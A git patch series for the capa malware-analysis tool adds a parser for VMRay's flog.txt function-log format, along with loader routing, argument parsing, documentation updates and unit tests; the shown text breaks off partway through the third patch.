From 1a2c3c01fa488e7e096c0c4bb8aad372c8eb87ee Mon Sep 17 00:00:00 2001 From: devs6186 Date: Mon, 23 Feb 2026 03:00:01 +0530 Subject: [PATCH 1/7] vmray: support parsing flog.txt (Download Function Log) Adds a parser for the VMRay flog.txt format (the free "Download Function Log" available from VMRay Threat Feed -> Full Report). Users no longer need the full ZIP archive to run capa against VMRay output. - capa/features/extractors/vmray/flog_txt.py: new parser for flog.txt header validation, Process/Thread/Region block splitting, API trace line parsing, sys_ prefix stripping - VMRayAnalysis.from_flog_txt() and VMRayExtractor.from_flog_txt() for constructing the extractor from a standalone flog.txt - helpers.py: detect flog.txt by filename + header magic; update unsupported-format error message to mention flog.txt - loader.py: route flog.txt inputs through VMRayExtractor.from_flog_txt - tests/test_vmray_flog_txt.py: 5 unit tests covering parse, header rejection, sys_ stripping, analysis and extractor construction Fixes #2452 --- CHANGELOG.md | 1 + capa/features/extractors/vmray/__init__.py | 57 ++++- capa/features/extractors/vmray/extractor.py | 5 + capa/features/extractors/vmray/flog_txt.py | 238 ++++++++++++++++++++ capa/helpers.py | 13 +- capa/loader.py | 11 +- doc/usage.md | 10 + tests/test_vmray_flog_txt.py | 131 +++++++++++ 8 files changed, 461 insertions(+), 5 deletions(-) create mode 100644 capa/features/extractors/vmray/flog_txt.py create mode 100644 tests/test_vmray_flog_txt.py diff --git a/CHANGELOG.md b/CHANGELOG.md index 3169082671..ed88f6ef90 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -5,6 +5,7 @@ ### New Features - ghidra: support PyGhidra @mike-hunhoff #2788 +- vmray: support parsing flog.txt (Download Function Log) without full ZIP @devs6186 #2452 - vmray: extract number features from whitelisted void_ptr parameters (hKey, hKeyRoot) @adeboyedn #2835 ### Breaking Changes diff --git a/capa/features/extractors/vmray/__init__.py b/capa/features/extractors/vmray/__init__.py index 0eaf0d4c22..a27b9ae1b6 100644 --- a/capa/features/extractors/vmray/__init__.py +++ b/capa/features/extractors/vmray/__init__.py @@ -20,13 +20,23 @@ from dataclasses import dataclass from capa.exceptions import UnsupportedFormatError -from capa.features.extractors.vmray.models import File, Flog, SummaryV2, StaticData, FunctionCall, xml_to_dict +from capa.features.extractors.vmray.models import ( + AnalysisMetadata, + File, + FileHashes, + Flog, + FunctionCall, + StaticData, + SummaryV2, + xml_to_dict, +) +from capa.features.extractors.vmray import flog_txt logger = logging.getLogger(__name__) DEFAULT_ARCHIVE_PASSWORD = b"infected" -SUPPORTED_FLOG_VERSIONS = ("2",) +SUPPORTED_FLOG_VERSIONS = ("1", "2") # "1" = flog.txt, "2" = flog.xml @dataclass @@ -132,6 +142,49 @@ def __init__(self, zipfile_path: Path): self._compute_monitor_threads() self._compute_monitor_process_calls() + @classmethod + def from_flog_txt(cls, flog_txt_path: Path) -> "VMRayAnalysis": + """ + Build VMRayAnalysis from a standalone flog.txt file (no ZIP). + Used when only the free "Download Function Log" from VMRay is available. + No submission file or static data; only API trace is available. + """ + self = cls.__new__(cls) + self.zipfile = None + self.flog = flog_txt.parse_flog_txt_path(flog_txt_path) + if self.flog.analysis.log_version not in SUPPORTED_FLOG_VERSIONS: + raise UnsupportedFormatError( + "VMRay feature extractor does not support flog version %s" % self.flog.analysis.log_version + ) + self.sv2 = SummaryV2( + analysis_metadata=AnalysisMetadata( + sample_type="unknown", + submission_filename=flog_txt_path.name, + ), + ) + self.submission_type = "unknown" + self.submission_name = flog_txt_path.name + self.submission_meta = File( + hash_values=FileHashes(md5="0" * 32, sha1="0" * 40, sha256="0" * 64), + is_sample=True, + ref_static_data=None, + ) + self.submission_sha256 = None + self.submission_static = None + self.submission_bytes = b"" + self.submission_base_address = None + self.exports = {} + self.imports = {} + self.sections = {} + self.monitor_processes = {} + self.monitor_threads = {} + self.monitor_threads_by_monitor_process = defaultdict(list) + self.monitor_process_calls = defaultdict(lambda: defaultdict(list)) + self._compute_monitor_processes() + self._compute_monitor_threads() + self._compute_monitor_process_calls() + return self + def _find_sample_file(self): logger.debug("searching archive for submission") diff --git a/capa/features/extractors/vmray/extractor.py b/capa/features/extractors/vmray/extractor.py index 27eeed4819..021eb33dc7 100644 --- a/capa/features/extractors/vmray/extractor.py +++ b/capa/features/extractors/vmray/extractor.py @@ -150,3 +150,8 @@ def get_call_name(self, ph, th, ch) -> str: @classmethod def from_zipfile(cls, zipfile_path: Path): return cls(VMRayAnalysis(zipfile_path)) + + @classmethod + def from_flog_txt(cls, flog_txt_path: Path): + """Build extractor from a standalone VMRay flog.txt (no ZIP). See #2452.""" + return cls(VMRayAnalysis.from_flog_txt(flog_txt_path)) diff --git a/capa/features/extractors/vmray/flog_txt.py b/capa/features/extractors/vmray/flog_txt.py new file mode 100644 index 0000000000..8f00d3168c --- /dev/null +++ b/capa/features/extractors/vmray/flog_txt.py @@ -0,0 +1,238 @@ +# Copyright 2024 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +""" +Parser for VMRay Function Log text format (flog.txt). + +flog.txt is a free download from VMRay (Threat Feed -> Full Report -> Download Function Log). +Format: header lines starting with "#", then Process: blocks containing Region: and Thread: +blocks. Thread blocks contain API trace lines like: + [0072.750] GetCurrentProcess () returned 0xffffffffffffffff + [0071.184] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc1dc + +See: https://github.com/mandiant/capa/issues/2452 +""" + +import re +from pathlib import Path +from typing import Any, Optional + +from capa.exceptions import UnsupportedFormatError +from capa.features.extractors.vmray.models import ( + Analysis, + Flog, + FunctionCall, + MonitorProcess, + MonitorThread, +) + +FLOG_TXT_VERSION_HEADER = "# Flog Txt Version 1" + + +def _parse_hex_or_decimal(s: str) -> int: + s = s.strip().strip('"') + if s.startswith("0x") or s.startswith("0X"): + return int(s, 16) + return int(s, 10) + + +def _parse_properties(block: str) -> dict[str, Any]: + """Parse key = value lines from a Process/Thread/Region block.""" + result: dict[str, Any] = {} + for line in block.splitlines(): + line = line.strip() + if not line or " = " not in line: + continue + key, _, value = line.partition(" = ") + key = key.strip() + value = value.strip() + if key in ("os_pid", "os_parent_pid", "parent_id", "process_id", "thread_id", "os_tid", "id"): + result[key] = _parse_hex_or_decimal(value) + elif key in ("filename", "image_name", "cmd_line", "monitor_reason"): + result[key] = value.strip('"').replace("\\\\", "\\").strip() + else: + result[key] = value + return result + + +def _parse_event(line: str) -> Optional[tuple[str, str, Optional[int]]]: + """ + Parse one API trace line. Returns (api_name, args_str, return_value) or None. + Examples: + [0072.750] GetCurrentProcess () returned 0xffffffffffffffff + [0071.184] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc1dc + [0083.567] CoTaskMemFree (pv=0x746aa0) + """ + line = line.strip() + if not line.startswith("["): + return None + # [timestamp] api_name (args) [returned rv] + match = re.match(r"\[\s*(\d+)\.(\d+)\]\s+(\S+)\s*\((.*)\)\s*(?:returned\s+(0x[0-9a-fA-F]+|\d+))?", line) + if not match: + return None + _major, _minor, api_name, args, rv = match.groups() + args = args.strip() if args else "" + return_value: Optional[int] = None + if rv: + return_value = _parse_hex_or_decimal(rv) + return (api_name, args, return_value) + + +def _parse_thread_block( + block: str, thread_props: dict[str, Any] +) -> Optional[tuple[MonitorThread, list[tuple[str, str, Optional[int]]]]]: + """Parse a Thread: block; return MonitorThread and collect events (caller adds them).""" + lines = block.splitlines() + events: list[tuple[str, str, Optional[int]]] = [] + for line in lines: + if line.strip().startswith("["): + ev = _parse_event(line) + if ev: + events.append(ev) + thread_id = thread_props.get("thread_id") or thread_props.get("id") + os_tid = thread_props.get("os_tid", 0) + process_id = thread_props.get("process_id", 0) + if thread_id is None: + return None + # We return the MonitorThread; events are converted to FunctionCalls by the caller + return MonitorThread( + ts=0, + thread_id=int(thread_id), + process_id=int(process_id), + os_tid=int(os_tid) if os_tid else 0, + ), events + + +def _parse_process_block(block: str) -> Optional[tuple[MonitorProcess, list[MonitorThread], list[FunctionCall]]]: + """ + Parse a Process: block. Returns (MonitorProcess, list of MonitorThread, list of FunctionCall) or None. + """ + # Split by Thread: on its own line (allow optional whitespace) + parts = re.split(r"\n\s*Thread:\s*\n", block) + if len(parts) < 2: + return None # no Thread: block found + header_and_regions = parts[0] + thread_blocks = [p.strip() for p in parts[1:] if p.strip()] + + # First part: Process properties then Region: blocks + process_props = _parse_properties(header_and_regions.split("\nRegion:\n")[0]) + process_id = process_props.get("id") or process_props.get("process_id") + if process_id is None: + return None + monitor_process = MonitorProcess( + ts=0, + process_id=int(process_id), + image_name=process_props.get("image_name", "").strip('"') or "unknown", + filename=process_props.get("filename", "").strip('"') or "", + os_pid=process_props.get("os_pid", 0) or 0, + monitor_reason=process_props.get("monitor_reason", "analysis_target").strip('"'), + parent_id=int(process_props.get("parent_id", 0) or 0), + os_parent_pid=int(process_props.get("os_parent_pid", 0) or 0), + cmd_line=process_props.get("cmd_line", "").strip('"') or "", + ) + + threads: list[MonitorThread] = [] + function_calls: list[FunctionCall] = [] + fncall_id = 0 + for thread_block in thread_blocks: + thread_props = _parse_properties(thread_block) + thread_props["process_id"] = process_id + parsed = _parse_thread_block(thread_block, thread_props) + if parsed is None: + continue + mon_thread, events = parsed + threads.append(mon_thread) + for api_name, args_str, rv in events: + fncall_id += 1 + # Strip sys_ prefix for Linux kernel calls (match XML behavior) + if api_name.startswith("sys_"): + api_name = api_name[4:] + function_calls.append( + FunctionCall( + fncall_id=fncall_id, + process_id=mon_thread.process_id, + thread_id=mon_thread.thread_id, + name=api_name, + params_in=None, # flog.txt args could be parsed later into Param list + params_out=None, + ) + ) + + return (monitor_process, threads, function_calls) + + +def parse_flog_txt(content: str) -> Flog: + """ + Parse flog.txt content into the same Flog (Analysis) model used by the XML path. + """ + # Skip BOM if present; normalize line endings so splits on "Process:\n" / "Thread:\n" work + if content.startswith("\ufeff"): + content = content[1:] + content = content.replace("\r\n", "\n").replace("\r", "\n") + lines = content.splitlines() + # Find end of header (first non-# line) + header_end: Optional[int] = None + for i, line in enumerate(lines): + if line.strip() and not line.strip().startswith("#"): + header_end = i + break + if header_end is None: + header_end = len(lines) + header = "\n".join(lines[:header_end]) + if FLOG_TXT_VERSION_HEADER not in header: + raise UnsupportedFormatError( + "File does not appear to be a VMRay flog.txt (missing '%s')" % FLOG_TXT_VERSION_HEADER + ) + body = "\n".join(lines[header_end:]).strip() + + # Split by "Process:" on its own line (allow optional whitespace) + process_blocks = re.split(r"\n\s*Process:\s*\n", body) + process_blocks = [b.strip() for b in process_blocks if b.strip()] + # If body started with "Process:\n", first element is the only block and starts with "Process:\n" + if not process_blocks and body.strip(): + # No split happened (e.g. body is "Process:\nid=..."), treat whole body as one process block + process_blocks = [body.strip()] + monitor_processes: list[MonitorProcess] = [] + monitor_threads: list[MonitorThread] = [] + function_calls: list[FunctionCall] = [] + + for block in process_blocks: + # First block may start with "Process:\n" when body began with that line + if block.lstrip().startswith("Process:"): + block = block.split("\n", 1)[-1].strip() if "\n" in block else "" + if not block: + continue + result = _parse_process_block(block) + if result is None: + continue # skip malformed process block + mon_process, threads, calls = result + monitor_processes.append(mon_process) + monitor_threads.extend(threads) + function_calls.extend(calls) + + # Use alias names so Pydantic accepts the lists (Analysis model uses alias= for XML compat) + analysis = Analysis( + log_version="1", + analyzer_version="flog.txt", + monitor_process=monitor_processes, + monitor_thread=monitor_threads, + fncall=function_calls, + ) + return Flog(analysis=analysis) + + +def parse_flog_txt_path(path: Path) -> Flog: + """Parse a flog.txt file from disk.""" + text = path.read_text(encoding="utf-8", errors="replace") + return parse_flog_txt(text) diff --git a/capa/helpers.py b/capa/helpers.py index 27c757dcc6..ddda8acb54 100644 --- a/capa/helpers.py +++ b/capa/helpers.py @@ -231,6 +231,14 @@ def get_format_from_extension(sample: Path) -> str: format_ = FORMAT_SC32 elif sample.name.endswith(EXTENSIONS_SHELLCODE_64): format_ = FORMAT_SC64 + elif sample.name.endswith("flog.txt"): + # VMRay free "Download Function Log" format (#2452) + try: + header = sample.read_bytes()[:512].decode("utf-8", errors="replace") + if "# Flog Txt Version 1" in header: + format_ = FORMAT_VMRAY + except (OSError, UnicodeDecodeError): + pass elif sample.name.endswith(EXTENSIONS_DYNAMIC): format_ = get_format_from_report(sample) elif sample.name.endswith(EXTENSIONS_FREEZE): @@ -307,9 +315,10 @@ def log_unsupported_vmray_report_error(error: str): logger.error(" Input file is not a valid VMRay analysis archive: %s", error) logger.error(" ") logger.error( - " capa only supports analyzing VMRay dynamic analysis archives containing summary_v2.json and flog.xml log files." + " capa supports analyzing VMRay dynamic analysis archives (containing summary_v2.json and flog.xml)" ) - logger.error(" Please make sure you have downloaded a dynamic analysis archive from VMRay.") + logger.error(" or a standalone VMRay function log (flog.txt, via Threat Feed -> Full Report -> Download Function Log).") + logger.error(" Please make sure you have downloaded a supported VMRay report.") logger.error("-" * 80) diff --git a/capa/loader.py b/capa/loader.py index d89d4c09fb..88a159af35 100644 --- a/capa/loader.py +++ b/capa/loader.py @@ -236,6 +236,8 @@ def get_extractor( elif backend == BACKEND_VMRAY: import capa.features.extractors.vmray.extractor + if input_path.name.endswith("flog.txt"): + return capa.features.extractors.vmray.extractor.VMRayExtractor.from_flog_txt(input_path) return capa.features.extractors.vmray.extractor.VMRayExtractor.from_zipfile(input_path) elif backend == BACKEND_DOTNET: @@ -491,7 +493,14 @@ def get_file_extractors(input_file: Path, input_format: str) -> list[FeatureExtr elif input_format == FORMAT_VMRAY: import capa.features.extractors.vmray.extractor - file_extractors.append(capa.features.extractors.vmray.extractor.VMRayExtractor.from_zipfile(input_file)) + if input_file.name.endswith("flog.txt"): + file_extractors.append( + capa.features.extractors.vmray.extractor.VMRayExtractor.from_flog_txt(input_file) + ) + else: + file_extractors.append( + capa.features.extractors.vmray.extractor.VMRayExtractor.from_zipfile(input_file) + ) elif input_format == FORMAT_BINEXPORT2: file_extractors = _get_binexport2_file_extractors(input_file) diff --git a/doc/usage.md b/doc/usage.md index 6a207ed6f6..fc5f9dcf6d 100644 --- a/doc/usage.md +++ b/doc/usage.md @@ -2,6 +2,16 @@ See `capa -h` for all supported arguments and usage examples. +## Ways to consume capa output + +| Option | Description | Typical use | +|--------|-------------|-------------| +| **CLI** | `capa` on the command line | Scripting, CI/CD, one-off analysis | +| [**IDA Pro**](https://github.com/mandiant/capa/tree/master/capa/ida/plugin) | capa Explorer plugin inside IDA | Interactive analysis with jump-to-address | +| [**Ghidra**](https://github.com/mandiant/capa/tree/master/capa/ghidra/plugin) | capa Explorer plugin inside Ghidra | Interactive analysis with Ghidra integration | +| [**CAPE**](https://www.mandiant.com/resources/blog/dynamic-capa-executable-behavior-cape-sandbox) | capa run on sandbox report (e.g. CAPE, VMRay ZIP or VMRay flog.txt) | Dynamic analysis of sandbox output | +| [**Web (capa Explorer)**](https://mandiant.github.io/capa/explorer/) | Web UI (upload JSON or load from URL) | Sharing results, viewing from VirusTotal or similar | + ## Default vs verbose output By default, capa shows only *top-level* rule matches: capabilities that are not already implied by another displayed rule. For example, if a rule "persist via Run registry key" matches and it *contains* a match for "set registry value", the default output lists only "persist via Run registry key". This keeps the default output short while still reflecting all detected capabilities at the top level. Use **`-v`** to see all rule matches, including nested ones. Use **`-vv`** for an even more detailed view that shows how each rule matched. diff --git a/tests/test_vmray_flog_txt.py b/tests/test_vmray_flog_txt.py new file mode 100644 index 0000000000..838a204bf8 --- /dev/null +++ b/tests/test_vmray_flog_txt.py @@ -0,0 +1,131 @@ +# Copyright 2024 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +"""Tests for VMRay flog.txt parser (#2452).""" + +import pytest + +from capa.exceptions import UnsupportedFormatError +from capa.features.extractors.vmray import flog_txt +from capa.features.extractors.vmray.extractor import VMRayExtractor + + +MINIMAL_FLOG_TXT = """ +# Log Creation Date: 08.10.2024 18:12:03 +# Analyzer Version: 2024.4.1 +# Flog Txt Version 1 + +Process: +id = "1" +os_pid = "0x118c" +os_parent_pid = "0x7d8" +parent_id = "0" +image_name = "svchost.exe" +filename = "c:\\\\users\\\\test\\\\desktop\\\\svchost.exe" +cmd_line = "\\"c:\\\\users\\\\test\\\\desktop\\\\svchost.exe\\" " +monitor_reason = "analysis_target" + +Region: +id = "125" +name = "private_0x0000000000010000" + +Thread: +id = "1" +os_tid = "0x117c" + [0072.750] GetCurrentProcess () returned 0xffffffffffffffff + [0071.184] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc1dc + [0066.433] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 +""" + + +def test_parse_flog_txt_minimal(tmp_path): + # Write as binary so newlines are exactly \n (avoids Windows \r\n) + path = tmp_path / "flog.txt" + path.write_bytes( + b'# Flog Txt Version 1\n\n' + b'Process:\n' + b'id = "1"\n' + b'os_pid = "0x118c"\n' + b'image_name = "svchost.exe"\n' + b'filename = "test.exe"\n' + b'monitor_reason = "analysis_target"\n' + b'parent_id = "0"\n' + b'os_parent_pid = "0"\n' + b'cmd_line = ""\n\n' + b'Thread:\n' + b'id = "1"\n' + b'os_tid = "0x117c"\n' + b' [0072.750] GetCurrentProcess () returned 0xffffffffffffffff\n' + ) + flog = flog_txt.parse_flog_txt_path(path) + assert flog.analysis.log_version == "1" + assert len(flog.analysis.monitor_processes) == 1 + proc = flog.analysis.monitor_processes[0] + assert proc.image_name == "svchost.exe" + assert proc.process_id == 1 + assert proc.os_pid == 0x118C + assert len(flog.analysis.monitor_threads) == 1 + thread = flog.analysis.monitor_threads[0] + assert thread.thread_id == 1 + assert thread.process_id == 1 + assert len(flog.analysis.function_calls) == 1 + assert flog.analysis.function_calls[0].name == "GetCurrentProcess" + + +def test_parse_flog_txt_rejects_wrong_header(): + with pytest.raises(UnsupportedFormatError, match="does not appear to be a VMRay flog.txt"): + flog_txt.parse_flog_txt("not a flog\nProcess:\nid = 1\n") + + +def test_parse_flog_txt_sys_prefix_stripped(tmp_path): + # Linux kernel calls start with sys_; parser should strip for consistency with XML + path = tmp_path / "flog.txt" + path.write_bytes( + b'# Flog Txt Version 1\n\n' + b'Process:\nid = "1"\nos_pid = "0x1000"\nparent_id = "0"\nos_parent_pid = "0"\n' + b'image_name = "sample"\nfilename = "x"\ncmd_line = ""\nmonitor_reason = "a"\n\n' + b'Thread:\nid = "1"\nos_tid = "0x2000"\n [0001.000] sys_time () returned 0x0\n' + ) + flog = flog_txt.parse_flog_txt_path(path) + assert len(flog.analysis.function_calls) == 1 + assert flog.analysis.function_calls[0].name == "time" + + +def test_vmray_analysis_from_flog_txt(tmp_path): + path = tmp_path / "flog.txt" + path.write_bytes(MINIMAL_FLOG_TXT.encode("utf-8").replace(b"\r\n", b"\n").replace(b"\r", b"\n")) + from capa.features.extractors.vmray import VMRayAnalysis + + analysis = VMRayAnalysis.from_flog_txt(path) + assert analysis.submission_name == "flog.txt" + assert analysis.submission_type == "unknown" + assert analysis.submission_meta is not None + assert analysis.submission_static is None + assert len(analysis.monitor_processes) == 1 + assert len(analysis.monitor_process_calls) >= 1 + + +def test_vmray_extractor_from_flog_txt(tmp_path): + from capa.features.address import NO_ADDRESS + + path = tmp_path / "flog.txt" + path.write_bytes(MINIMAL_FLOG_TXT.encode("utf-8").replace(b"\r\n", b"\n").replace(b"\r", b"\n")) + ext = VMRayExtractor.from_flog_txt(path) + assert ext.get_base_address() is NO_ADDRESS # no base address from flog.txt + procs = list(ext.get_processes()) + assert len(procs) == 1 + threads = list(ext.get_threads(procs[0])) + assert len(threads) == 1 + calls = list(ext.get_calls(procs[0], threads[0])) + assert len(calls) == 3 From b92472137aff0b9d48f807ea96ffdfc2e4697c3d Mon Sep 17 00:00:00 2001 From: devs6186 Date: Mon, 23 Feb 2026 03:53:44 +0530 Subject: [PATCH 2/7] vmray: address code review feedback for flog.txt parser - Handle empty strings in _parse_hex_or_decimal (return 0 instead of crash) - Use regex for Region: block splitting (consistent with Process:/Thread:) - Parse API call arguments into Param objects so String/Number features are extracted (string args use void_ptr+str deref to match XML convention) - Use FunctionCall.model_validate instead of __init__ to work around Pydantic alias "in" clashing with Python keyword - Add test_parse_flog_txt_args_parsed covering string, numeric, and no-arg API calls --- capa/features/extractors/vmray/flog_txt.py | 66 ++++++++++++++++++---- tests/test_vmray_flog_txt.py | 39 +++++++++++++ 2 files changed, 95 insertions(+), 10 deletions(-) diff --git a/capa/features/extractors/vmray/flog_txt.py b/capa/features/extractors/vmray/flog_txt.py index 8f00d3168c..fd341b9587 100644 --- a/capa/features/extractors/vmray/flog_txt.py +++ b/capa/features/extractors/vmray/flog_txt.py @@ -35,14 +35,22 @@ FunctionCall, MonitorProcess, MonitorThread, + Param, + Params, ) FLOG_TXT_VERSION_HEADER = "# Flog Txt Version 1" +# Matches name=value argument pairs inside an API call's parentheses. +# value may be: "quoted string" (including escaped chars), 0xHEX, decimal, or other token. +_PARAM_RE = re.compile(r'(\w+)=((?:"(?:[^"\\]|\\.)*")|(?:0x[0-9a-fA-F]+)|(?:\d+)|(?:[^,\s]+))') + def _parse_hex_or_decimal(s: str) -> int: s = s.strip().strip('"') - if s.startswith("0x") or s.startswith("0X"): + if not s: + return 0 + if s.lower().startswith("0x"): return int(s, 16) return int(s, 10) @@ -66,6 +74,40 @@ def _parse_properties(block: str) -> dict[str, Any]: return result +def _parse_args(args_str: str) -> Optional[Params]: + """ + Parse an API call's argument string into a Params object. + + Handles: name="quoted string", name=0xHEX, name=DECIMAL. + String values are modelled as void_ptr + str deref to match the XML extractor convention + so that String features are correctly yielded by the call feature extractor. + Numeric values use type unsigned_32bit so that Number features are yielded. + Symbolic constants (e.g. NULL, TRUE) are skipped; their numeric values are unknown without + header definitions. + + Returns None if no parseable arguments are present. + """ + if not args_str.strip(): + return None + params: list[Param] = [] + for m in _PARAM_RE.finditer(args_str): + name = m.group(1) + raw = m.group(2) + if raw.startswith('"'): + # String value — model as void_ptr with str deref (matches XML extractor convention) + str_val = raw[1:-1] + params.append( + Param.model_validate({"name": name, "type": "void_ptr", "deref": {"type": "str", "value": str_val}}) + ) + elif re.match(r"^0x[0-9a-fA-F]+$", raw) or raw.isdigit(): + # Numeric value — model as integer so Number features are yielded + params.append(Param.model_validate({"name": name, "type": "unsigned_32bit", "value": raw})) + # else: symbolic constant (NULL, INVALID_HANDLE_VALUE, etc.) — skip; value not recoverable + if not params: + return None + return Params.model_validate({"param": params}) + + def _parse_event(line: str) -> Optional[tuple[str, str, Optional[int]]]: """ Parse one API trace line. Returns (api_name, args_str, return_value) or None. @@ -125,8 +167,8 @@ def _parse_process_block(block: str) -> Optional[tuple[MonitorProcess, list[Moni header_and_regions = parts[0] thread_blocks = [p.strip() for p in parts[1:] if p.strip()] - # First part: Process properties then Region: blocks - process_props = _parse_properties(header_and_regions.split("\nRegion:\n")[0]) + # First part: Process properties then Region: blocks (use regex for robustness) + process_props = _parse_properties(re.split(r"\n\s*Region:\s*\n", header_and_regions)[0]) process_id = process_props.get("id") or process_props.get("process_id") if process_id is None: return None @@ -158,14 +200,18 @@ def _parse_process_block(block: str) -> Optional[tuple[MonitorProcess, list[Moni # Strip sys_ prefix for Linux kernel calls (match XML behavior) if api_name.startswith("sys_"): api_name = api_name[4:] + # use model_validate because FunctionCall's "in" alias clashes with a Python keyword; + # passing params_in= via __init__ is silently dropped by Pydantic function_calls.append( - FunctionCall( - fncall_id=fncall_id, - process_id=mon_thread.process_id, - thread_id=mon_thread.thread_id, - name=api_name, - params_in=None, # flog.txt args could be parsed later into Param list - params_out=None, + FunctionCall.model_validate( + { + "fncall_id": fncall_id, + "process_id": mon_thread.process_id, + "thread_id": mon_thread.thread_id, + "name": api_name, + "in": _parse_args(args_str), + "out": None, + } ) ) diff --git a/tests/test_vmray_flog_txt.py b/tests/test_vmray_flog_txt.py index 838a204bf8..95088ea134 100644 --- a/tests/test_vmray_flog_txt.py +++ b/tests/test_vmray_flog_txt.py @@ -129,3 +129,42 @@ def test_vmray_extractor_from_flog_txt(tmp_path): assert len(threads) == 1 calls = list(ext.get_calls(procs[0], threads[0])) assert len(calls) == 3 + + +def test_parse_flog_txt_args_parsed(tmp_path): + """API call arguments are parsed into Param objects for feature extraction.""" + path = tmp_path / "flog.txt" + path.write_bytes( + b'# Flog Txt Version 1\n\n' + b'Process:\nid = "1"\nos_pid = "0x1000"\nparent_id = "0"\nos_parent_pid = "0"\n' + b'image_name = "sample"\nfilename = "x.exe"\ncmd_line = ""\nmonitor_reason = "a"\n\n' + b'Thread:\nid = "1"\nos_tid = "0x2000"\n' + b' [0001.000] CreateFile (lpFileName="test.exe", dwDesiredAccess=0x80000000) returned 0x4\n' + b' [0002.000] VirtualAlloc (lpAddress=0x0, dwSize=4096) returned 0x10000\n' + b' [0003.000] GetCurrentProcess () returned 0xffffffffffffffff\n' + ) + flog = flog_txt.parse_flog_txt_path(path) + calls = flog.analysis.function_calls + + # CreateFile: string param and numeric param + create_file = calls[0] + assert create_file.name == "CreateFile" + assert create_file.params_in is not None + params = {p.name: p for p in create_file.params_in.params} + assert "lpFileName" in params + assert params["lpFileName"].deref is not None + assert params["lpFileName"].deref.value == "test.exe" + assert "dwDesiredAccess" in params + assert params["dwDesiredAccess"].value == "0x80000000" + + # VirtualAlloc: two numeric params + virtual_alloc = calls[1] + assert virtual_alloc.params_in is not None + va_params = {p.name: p for p in virtual_alloc.params_in.params} + assert va_params["lpAddress"].value == "0x0" + assert va_params["dwSize"].value == "4096" + + # no-arg call: params_in should be None + get_proc = calls[2] + assert get_proc.name == "GetCurrentProcess" + assert get_proc.params_in is None From 548d814515e1744740043a22f261cb7b85d6ce2c Mon Sep 17 00:00:00 2001 From: devs6186 Date: Mon, 23 Feb 2026 16:24:19 +0530 Subject: [PATCH 3/7] vmray: add docs, fetch helper, and fixture-based regression tests for flog.txt MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Addresses reviewer feedback on #2878: 1. Document flog.txt vs full archive trade-offs in doc/usage.md with a comparison table (available features, how to obtain, file size). 2. Add scripts/fetch-vmray-flog.py — given a VMRay instance URL, API key, and sample SHA-256, downloads flog.txt via the REST API and optionally runs capa against it. 3. Add fixture-based regression tests (tests/fixtures/vmray/flog_txt/) with three representative flog.txt files: - windows_apis.flog.txt: Win32 APIs, string args with backslash paths, numeric args, multi-process - linux_syscalls.flog.txt: Linux sys_-prefixed calls (all stripped) - string_edge_cases.flog.txt: paths with spaces, UNC paths, URLs, empty tests/test_vmray_flog_txt.py gains 14 new feature-presence tests covering API, String, and Number extraction at the call scope, plus negative checks (double-backslash must not appear; sys_ prefix must not appear). Fixes #2878 --- CHANGELOG.md | 1 + doc/usage.md | 30 ++ scripts/fetch-vmray-flog.py | 270 +++++++++++++++++ .../vmray/flog_txt/linux_syscalls.flog.txt | 43 +++ .../vmray/flog_txt/string_edge_cases.flog.txt | 37 +++ .../vmray/flog_txt/windows_apis.flog.txt | 63 ++++ tests/test_vmray_flog_txt.py | 276 +++++++++++++++++- 7 files changed, 709 insertions(+), 11 deletions(-) create mode 100644 scripts/fetch-vmray-flog.py create mode 100644 tests/fixtures/vmray/flog_txt/linux_syscalls.flog.txt create mode 100644 tests/fixtures/vmray/flog_txt/string_edge_cases.flog.txt create mode 100644 tests/fixtures/vmray/flog_txt/windows_apis.flog.txt diff --git a/CHANGELOG.md b/CHANGELOG.md index ed88f6ef90..636f864436 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -6,6 +6,7 @@ - ghidra: support PyGhidra @mike-hunhoff #2788 - vmray: support parsing flog.txt (Download Function Log) without full ZIP @devs6186 #2452 +- vmray: add flog.txt vs archive docs, fetch-vmray-flog.py helper, and fixture-based regression tests @devs6186 #2878 - vmray: extract number features from whitelisted void_ptr parameters (hKey, hKeyRoot) @adeboyedn #2835 ### Breaking Changes diff --git a/doc/usage.md b/doc/usage.md index fc5f9dcf6d..d3ccfa8fd9 100644 --- a/doc/usage.md +++ b/doc/usage.md @@ -16,6 +16,36 @@ See `capa -h` for all supported arguments and usage examples. By default, capa shows only *top-level* rule matches: capabilities that are not already implied by another displayed rule. For example, if a rule "persist via Run registry key" matches and it *contains* a match for "set registry value", the default output lists only "persist via Run registry key". This keeps the default output short while still reflecting all detected capabilities at the top level. Use **`-v`** to see all rule matches, including nested ones. Use **`-vv`** for an even more detailed view that shows how each rule matched. +## VMRay: flog.txt vs full analysis archive + +When analysing VMRay output you can give capa either the full analysis **ZIP archive** or just the **flog.txt** function-log file. +Choose based on what you have access to and what features you need. + +| | **flog.txt** (free, "Download Function Log") | **Full VMRay ZIP archive** | +|-|-|-| +| **How to obtain** | VMRay Threat Feed → Full Report → *Download Function Log* | Purchased subscription; *Download Analysis Archive* | +| **File size** | Small text file | Large encrypted ZIP | +| **Dynamic API calls** | ✓ | ✓ | +| **String arguments** | ✓ (parsed from text) | ✓ (from structured XML) | +| **Numeric arguments** | ✓ (parsed from text) | ✓ (from structured XML) | +| **Static imports / exports** | ✗ | ✓ | +| **PE/ELF section names** | ✗ | ✓ | +| **Embedded file strings** | ✗ | ✓ | +| **Base 